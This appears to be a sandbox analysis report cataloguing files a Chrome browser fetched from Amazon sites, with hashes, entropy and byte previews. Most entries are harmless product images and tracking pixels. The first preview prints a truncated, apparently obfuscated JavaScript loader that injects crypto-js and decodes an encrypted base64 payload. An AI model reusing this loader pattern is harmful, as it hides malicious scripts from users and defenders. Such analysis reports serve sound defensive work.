                                                                                                                                                                                                                                                                      Preview: var BenfcEgKsHewctVy = document.createElement("script");..BenfcEgKsHewctVy.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(BenfcEgKsHewctVy);..BenfcEgKsHewctVy.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiS05wN0g1SEliSWlaQkV0UXlHZUpaRVR1Y2hEQ3BjZDVwTlpJV0JIMjc4Qk93TnpDQjFtZFwvVlJqOXR6dk5aZUNPRWZkczBxcnBSM1Q1WXhibnJxZ2dwbHRDMHRDcThqQlVPV2l4MXRubGZuemZcLzdrcUYzeGdsaTNvVmR4T0xYNm1LSWNlVHkrZ2RlZGdEY05qQUFVd0lEMGxaQVdnZ1VDMWxUd3QrRkY2Z2pQMHV0OUxmTXZ3YjJGaVRsZlRXRXR1QmFMQzJuU2Q0QmJDaElQaDZIMDlWbjF0UjRoVFRXNU40VEthNUVnZTR5aEs4VWd5YkgrQ3lsRGQrclpyTEsyblNJQVNRdTRmTFwvSzVZVmJVM01SUEhqRWZtekEwbDJhU1VlV05kNUN2XC9rcFl2VUpobGU3c05BRGswbDZcL2Y5SWNWV2RkblJkQWJMRTNNYThESzlyWDB6Z09VMVdkTVwvNlBTWTZxa2drOWt4YWNwc0pVWjRNckJWNjE3SERPc0RtWVQ3ZTJ4YnFtXC9LYlF5UHhVSUZrelU0eitFcU4xSE9WaXdHNkpCMmRXeWJGeVNIN2hiWWlcL05NeGVpYlVoTUxKYVwvZlFoakZPQk41ZlZ3a3lEdjBcL3ZrSE9xeVBOb1RLK2FPZ2NDWW9FQ3hMS29kMVNORzBnQjFTV3UxVXlJOTIxbWFyZE5uR3
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://aax-eu.amazon.ae/x/px/ROAZJXecL-vBvC-Yjxkq97kAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICDFIFP4/atf/%7B%22atf%22:false%7D
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 250x250, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):9962
                                                                                                                                                                                                                                                                      Entropy (8bit):7.958302140755193
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:L+gbx4jCul1esQuZ7wK8SkGZJozflTnIHp+JLHy11OXLl0TdERl39lk01sui:L+gnkS47wbSkGZqlgp+Jo1wupEf3z716
                                                                                                                                                                                                                                                                      MD5:C399636513BEC53300E2D2AA48838273
                                                                                                                                                                                                                                                                      SHA1:16DBAC1F178F1B46C4EE513A9684A504F78865D0
                                                                                                                                                                                                                                                                      SHA-256:D7DBCD02D499B10A79CF14ECC060F56D4BBFD58E7F96290BF95F40B13D395269
                                                                                                                                                                                                                                                                      SHA-512:62503294C4BA583DA22D77DBB281EB8010B7AE555053EF967FF4BAED2FCFDEE09843FE7B64A470745DCAE56D5F9B07824518ADBA8EABFE18514BD66AA68BCF0B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.........................!.....+....'...'.''.#'##,'!!',#');)0+5,)8););::=BC;'BZ..........!8'.,:0.)E:C,:=::+L:C8:#;:,55,,0)0:,==;.+=8'Q+,':8B5'=H..........."...............................................................!1."AQ.2aq..#Brs....$4R...35CS...b...%t..................................................!1.."2Aq..#Qa..34B............?...Pu,..@..[E...U.9.?w.?h<.,o..Fg@....,..9....Jh...Q..C.Dp...(....F.N..p.....4e.4...O.Zdc.].{.38C'x/..o.K:."..Q..b...&N).e...&.V8.............oM?Sm..$.*..2..#......#k...........2?.F...JF7..=.].K;....d@.n...?..c4.L....f...mUe}..f...u....1x.....*.........{E...."...u...Z.e...k...n:........\K.h.,.Olc..........GZY.....M....yu\QS..>...S.9.........i..?....nSw4x.q..&.9_.'.Z.l.N...o.7..B.....U.y......NB..;.!....".B..A.B!.!....".B..D.+.N.7.,.'..N..X.?....&....E.kGyN...G{..B.......Z........Gr|.\.._.zP.%s..94.v.&.:9.....X.VW0..2..1..94U..nF.\.bF.c.hs....o{....w....L..2.1...%..5,]N...........]e..OQ..#....f3..V....A....:....x.5.....E
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 251x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10738
                                                                                                                                                                                                                                                                      Entropy (8bit):7.898284405727076
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:5g/cCAk6O2BCls38vmEXrZVd8YiMkHGrgEZvFj4ZAQyw9pDL8w:q/Rj2Als38vBbZzpiMWm9jIAQyw9pvR
                                                                                                                                                                                                                                                                      MD5:E097F29ED9EA65A1C319EDFBE656AD0B
                                                                                                                                                                                                                                                                      SHA1:B6463C1E11B56632A88349924D09A433CF19CCAC
                                                                                                                                                                                                                                                                      SHA-256:C801A4D4B9545A3A6A72456D72B4D09EBF36595FEA3007738BDFAA6978966AD4
                                                                                                                                                                                                                                                                      SHA-512:2649935040D59E544230E38C87EAC50F48B8CBBE189AB285FBFF0AD2869D63EC783DBD9F09DFE0EFCF80113B6A59090953EFCEF1B568068A8A25C1457BA43073
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71rwNOd-76S._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3......................................................................h......1.z.......E...E..........Dw...jg..l..}w.-.T........,..........+V..l....v....w.....#.,....j.).o..bI..........K.&_=5+X.."N...).b.hy.o.........|.@......Z.O.v...}....}.^W..MY.|>..+9.?..L.......p..@..."(}..w.....:.............3..<..4....Y..w.g.M.@O......-..h....z...?N...~..z...F7<bmM.,\..~mN-.I.xq6j.m5v.........?.j..=c....k5.......5.......o.......o6k.0.....4....uN!...z.~-m..L....k...J..7f..F.|.@......>..i..5....Ch.zp...EN=^.TX......w.$|8......B.xR...........F..................&.z.....$z(.........~N......<.FJD......>.#.f.X.\V,Ev..t .....dL.$.........p....m|..Z.......|}...63x....AW/.R?._.._.1.#zT....s.....g.}.........[x.J.....<.+....................F*...bQ...........1.(.v..U..9.[..b.......H.y.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3127
                                                                                                                                                                                                                                                                      Entropy (8bit):7.8097143692908055
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r6AoDiNqIQ6RftdQsiZle7GUcz31VxnMpZ965j+CYHBofPRNu+Ir1o:TFSqkRFHi+71c5znMpr6EC8ofqo
                                                                                                                                                                                                                                                                      MD5:F25B0E45F05F68DEE0937378F4D87492
                                                                                                                                                                                                                                                                      SHA1:53F7FBD8AA2E89FE6B31F6B39565081C9FEA29AE
                                                                                                                                                                                                                                                                      SHA-256:DD9BBFA7E5F17D00458B24A4A2A80F13EA466DC3FCE6670DD2FAEBEA9D602BBC
                                                                                                                                                                                                                                                                      SHA-512:784FC94B89E747A4C5956C83DDE4B68A569EF4F25080C6EB7EEFD601BC5530DDC338F5BAFFDBFA8FC766D3C8B69CE5238B129024D150964C70A16D26DE9B39AF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!.1Q".ARq..#Bab.t...2r.................................................!1.A."2..Q............?....""...T. .....+...Z.)...X...kwi.XhfP.-n8.!`..Rs.0""...." ...""...." ...""........R.}.fr%..CTi...&.U]....a>.F-.w.t....m/...eV@7.v...._j.....y{H.U..T-9.....|_A?..>P.*.........y...`.#. ...b"i.9..>.6..N..............b..-;Z..B.}....Bd.....'.)Kn....Z.....'\c4...)S?..O.7.......c.Z..ru\...!.Q.".E......q.|...2..F.L{..]e.po.H.@.....n85_N..V;.{.2..h}.I..""...." ...""...." ..."'/.....0.?..F.....2Q1....Z...&.....q.RU.......D..#..L..1s...^.*..~.a..@..<.+.b.r(W.....Uwf..%.........-.."+}.....3`1/..^>..@......+..?.vYTY..C%..[b..`{.m...Wc.6.y.8j..t...w.:....t....h."....=NBZ.....(3....~..1.4L...T..Z.J0u/i......3...g nx.7>I..s59Y...@..." ...""..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 109x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5681
                                                                                                                                                                                                                                                                      Entropy (8bit):7.933002103935282
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TmCU+wKbQxxoGh+lQL9b+Bdk6kOY1GRc5RnSjxJlbfkt47WqNfUSJLMdFe:SwQ0GH9l+45VSHtfk47WUpJLke
                                                                                                                                                                                                                                                                      MD5:DE859558D3C677B9B3DFF58E9E810CB3
                                                                                                                                                                                                                                                                      SHA1:09D808C345DEAFF1C5FE3B7E99A593F677AFD6B8
                                                                                                                                                                                                                                                                      SHA-256:C47459B4767AB582013E1F55403A03F42D05B9D4FFF08EB6728A72D8D6AFDD27
                                                                                                                                                                                                                                                                      SHA-512:5326C2ED66AEC88112A42851F31C77DD9BA982C11DBAAA440DEB8BF5BAEE4516A0AA3EE10186BB11BB7B5B4AC021953A410F777CE59967B9A868F859BAA40218
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51dMriM2HlL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........m.."................................................................!1...AQa."q2BR.......#3Cbr..$st...6c................................................!.1R..2a............?..tQE.E.P...I#.U.....s$....|S....?..P3.......#.."B..$-S.oZ.i.5=.D.u'H..&Zo.*...kq..]........u.T$/..9..i..c..0.^)g....F...=>..L.{...g.*:j.P..$.b;. .K...P.y.uJ....%.+......P.< ...g.8..d2....#)H<M...e.g...Kxa..s5.l%.z.FK.....>n|.~....=...h..w....d......u4H..M..I.>.=.Y.v..%..Z...i...n.O.\.}Q..K.0.Wc.~.E...Q@QE...T}..kz?...4.k.|.H..b~...%.f.......i.X'8..r_.-....%..%@SI....T.r<.{...GO~...?..s..|[..r..$...T.....[k..^.x...M.[t.m..........K.......#..."BLed.B.-.H....+(nj.....nV..`H........$.vc..c..l..i..d..V%..Q...F.duF.e./.B.*..B...ob..H...(X...>m.T..`tE.0..u8.Fr..0b..J.&W.A...?.z.\.A{..../`X.k!.L=..x5A..-..v.4.uX.s8..I..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):29265
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9398083328038505
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:WCI4GScYwckj7HsWQPO9OgXp9k3l/WbDMkUkUnaq+:WCZ5Gj7RQ29OMp23l/kAkknaq+
                                                                                                                                                                                                                                                                      MD5:E4EAA5BDC19B7946427AA063B2AA636C
                                                                                                                                                                                                                                                                      SHA1:22635D817E8EE5D9FF9680186975D2F7F73D372D
                                                                                                                                                                                                                                                                      SHA-256:AFFD1BF41B521BEE3861A82B73D8CA5055931E2A6619C47763B96396A8001AA1
                                                                                                                                                                                                                                                                      SHA-512:EBFAF4591762BF398DF89F13D87783CFD9F981238F8029DAF0449BDDA7AC836D22752E55F95C5D6726ADDF8CC66E898492C537B6EAF69E62B2FD3391D71D5071
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_Gold/xcm_banners_mena_440x300_coop_4col_phl-liveplants_440x300_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................@...............................!.1.."Q.Aq.$2a..#%...)3.:Erw.....................................5..........................!.1"..A2Q.#Raq$B..3.&................?...1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc4....}k...{.........f...X..3mK...[J..+....Zw..q-.#M.iV.mn!.{z.Iqhgk.BT....%.....^..4yq.F.=.[(...)*RT.Yq.!IR...[J...[.-.6..R....a*..q..!.#.........^...... .A.l...~.?.17q.g...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c.)._..&P..E...)....-.....%...U..-..X.bu>.!..jP3..Y.;..j<.E...~[.....;.etj=}.Q...&.*.!......V........_.N';.V..Q..m-.!Z....*..o[...oZ..:..~r.q..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 169x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10427
                                                                                                                                                                                                                                                                      Entropy (8bit):7.962248716829095
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:3ITcYnu+XzI2xIZr7PdVsYanDK5Ygz7QM6BjxoYysk4aIFaErepSt4ziUxn:3Ixu+XzXx+dV/anD0QMSFoYys3afErQ7
                                                                                                                                                                                                                                                                      MD5:D009DD402EA4CB2EFFFFCD816B0EB8A0
                                                                                                                                                                                                                                                                      SHA1:038C58EDA65E6D88931B87BE9A0F67FDDA64E32D
                                                                                                                                                                                                                                                                      SHA-256:17F82AF309321290CE8DBB5A26D874C4929AE4E3E71396A96FFE57798BB15A55
                                                                                                                                                                                                                                                                      SHA-512:138C5F8FB713D26BB38794534036095805C96BD436511CAC41DB06F678EBAED5F51D754B599D482067A21E3599767E9894633D94C66311C71528021AF3B6A4F1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1.AQa"q....2BR....#3Cbr....4st...5Sd..%c....$U.....................................................!1..aq"2A..$3...BQr.............?..x.....].,.............(..^...U.U.9s.....K.....b.En..V>;.0...4n..$..C..f..0..7Bl...I.....b=v_..]...W...'.....k".....c.79....L...1.JM....0..........].#..>..p..z.......!..=.......M$H.zI.......uZ=...O.8...?.1...I.~V.......V.x....9.yg...{......._..@..k].[...7....;.\.w..V.....?58....C.....].w.j...........J.].J..[p./..O....g>.WQ.=-$j .......pz.vqni.z[.....eN.......b..*..'..kt,...Z.....=z......_.......n..E.<l4.[...._o?,ln.........S..-g.~OOHB...2...{I.>.....&.....q.38..O......xh_..E...~.4hQH..nK.7..o.7.;......N<...-.k.Z..r..+..\...[..,r.M/s....w........g...5...............B.]L.*;..jo%..Z.C1Rl...N.U<.yZ...N98
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3517
                                                                                                                                                                                                                                                                      Entropy (8bit):7.805470705852963
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:JNdjn+XvKwlFWtBrxTFKLsuA/DShlI7IXLK94sZ:JNpnEjWtBNTYLsx/DShlRbK94Q
                                                                                                                                                                                                                                                                      MD5:F5256DBAC361D6E6CC711508E65CEA18
                                                                                                                                                                                                                                                                      SHA1:79FE228703159B9996647C71DFF41E9E55BC9C72
                                                                                                                                                                                                                                                                      SHA-256:7556377C7C03D50C4D64EF52F44AA62FBCDF0B660404E457FD352B16D14672B5
                                                                                                                                                                                                                                                                      SHA-512:ADFFCAE7D59A60D7778F7AD87E9AF74F6E6AFE502D80A639FD2E53C966505271DB9C1BD817AB76F4AF99F4363A517482342A06AAD3F13D95BA358C6DB40A391F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610033_186x116_1X_en_AE._SY116_CB582137121_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........7....................................................................H................l\..7Y...E....c....-.?.....2:....2o.2.u....Q.{.#%.Re..]......IM...RFb..h........hxq........g.........N.k:N.#..i.9...D.._.ea..T..._....].7I%..D..W5"..i...*..+._.y..h.....^..r.B..ZR...6.k;.i..._.].i.?.5.P...slPz....LX...A.s.....}...q..c^..J_*..^G~...r..e;.o.(e=.c.v..w.r...iH.}...|..`>.....:O...!..d..4..................I.........................#3.CS....$c.....%04DTs....5Uet7P.........'............?..k>..:...n.):8...S8B".......8..z.g,q.M..VH.....+_..-GVX........gI=c.$q.$........:..m....vr.Q..%J!R.J..q..]..%.b.t.....Q.(...Vd.........r.....3D8..n.fR.iT..)...)..k`.%......n"......7..15....A.....rq...R.{.....|..^...._.3w.X....U.2..N.E-...@f.O.)..]...d..S.b...~.Sj(W#tH.i.!J....)K.E..yKA+2...T.P.W.J_k
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):42780
                                                                                                                                                                                                                                                                      Entropy (8bit):7.924561093329248
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyY32mHtWKedyWYCfy3fWhse1LH7y+hc7mmZt+sHtUoMKKU:4E31BeAWYCDhfhHe+hcZ7lHtJ9
                                                                                                                                                                                                                                                                      MD5:30AE77040DEE6A4830D592E35706E417
                                                                                                                                                                                                                                                                      SHA1:B4343DC008E303878BE7A933575595D1464BB0A9
                                                                                                                                                                                                                                                                      SHA-256:E40335BFC988E305883FEE523AA50ECFB1176189F143CD1F67C92B4507FBF0BD
                                                                                                                                                                                                                                                                      SHA-512:4BF498AB7BA70609049FCF7642594CC3EACE19CAFB41DB1894FFBF49F94895348E14F9FA49FC73F7CF4C24C1395758677404BF3EC2427499B9DF650B1F041623
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 640x640, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):33144
                                                                                                                                                                                                                                                                      Entropy (8bit):7.963314496470416
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:LtvI/IFVUvONeO2BdeuJy852YD/gTgrThj65/lO8qFx6/YjBQlPwn3YQkyUF+L8R:LNI/IFVUxB3/k0f50lLKmPwDvWeRHZ0
                                                                                                                                                                                                                                                                      MD5:C5B57D5A6992EE1CF0C4A200198F475D
                                                                                                                                                                                                                                                                      SHA1:80952D71248190AC33B12A6CBF602792B05BEA7C
                                                                                                                                                                                                                                                                      SHA-256:539BEFC20335C304EE27FFA8ADF96E6A7BBB3D7E2CFCFFF03E58E702F54F083A
                                                                                                                                                                                                                                                                      SHA-512:A7AC9BA246BE1BF155429B113E37B7D22084E5CCD1AC734C3FF7F31FB3DA815BED2B3A9A004E7DD1F77B6B8178F918F6E672581A12B0D3F36F3B5F3D3F8F1145
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71hwZS1q69L._AC_UL640_QL65_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.........................!.....+....'...'.''.#'##,'!!',#');)0+5,)8););::=BC;'BZ..........!8'.,:0.)E:C,:=::+L:C8:#;:,55,,0)0:,==;.+=8'Q+,':8B5'=H..........."..........4.......................................................................;-...H.id..6B*&.........................qu.......p...y....m.~L..jfS.f........y5..5...qE.]!d.8.QDe..j......................2.\;"..w..[q...........bF..%..../.1..4....H........K.........~@...................m..O........Y6.jZV.d8.A..E.{kV..+X..\...(cRJ..T.\W_.x.t.u..LrM2.[K".y..].c..................H.ZD.m..q[..:...t.2.i.......A.....0.j_**E....h..;...=[X2......:.G........Z..)Y...................X....Y:M..ywa..0..8.._..p.....F..xK.d....H1........]fn...Y.V..c..=O...%6.'...D............,...+B+f.#....[|Z....Y.2.&&Y.3.U...J[.........J_d.c.ylW...z.Y.h.2.....y4.~....W.|L.`...........fpU...I..E..{.....L@../...nM..6..4.Lp..I.)/..&.RL. ...m......E..4....W...G|$....q.......%..Z............D..s..[.:nJ..!..-\.nF.>..b(`.9.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x246, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):27711
                                                                                                                                                                                                                                                                      Entropy (8bit):7.980090824368657
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:fYipwiiuXkVOp7nmarrcExF9x0V1hiiVAGUDKbCjgfCJKAlhgVtj0wthZppbEEcD:f/2LVOVm4JF94fNUDK/aVCDNvbo
                                                                                                                                                                                                                                                                      MD5:13B56BAB6FC4CFB3AC4F106A2D007F5F
                                                                                                                                                                                                                                                                      SHA1:2A19923BC30CF38AC1FF5C7EB1963AD56145F603
                                                                                                                                                                                                                                                                      SHA-256:081DE08562FD38575618A8C2E979703B6CE8810740FF8CFC431CF557065F8FAB
                                                                                                                                                                                                                                                                      SHA-512:D95119AECBB399F7F9D0605167F63792899EB289AA1103EE7FFA360783EAD880897EC9400E991A446EC9FF487AAF67EAB00B7902A5CD1DE7C5A2E178C744E16F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5..................................................................k..$.L0...2.......3...!O...4.k....;N..-.f.YF5.....X.y...slN.g..^/.y.1...%..qy.........e.x.....rg....w...z.,vc.&.........\..o)..;.....l,.j.hgRB6G..b.._/c.?..p`d.C...t...J.\.Z..&..u...t..re0..N.[r...J.q}..He.My..'..4.D...\.......9....*..w..f-.).V...<c.g....e${...ih.?.....d.......%..]uq\...&.:...,...|.:W'..R..W.9msN...!.2..2*./.G...v'O.W..$q.O..\.,.......]:..{[.h.......(.........,..^.G....../X."..L.....{.f...).z...$.x.ER(..<Y.i.i...........^\.&...l..Z.%......n...s.^E...'=....-.D..L.....s..........N...w.<w=o8^.fm.R~=..f......Lb.B.--..Vr..r5.Bu..'0Ih.I.s.*......Z*o.r...!...W.x..r..=..2~....:../...<^./|.d..l..M.)?`.n.2G.).^*....e..2...c...S....4C*=.]..4.c.)......h.S..{`P..$}..U..*..v....z...{HJ..V...7,._.p.Q_gF.%..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
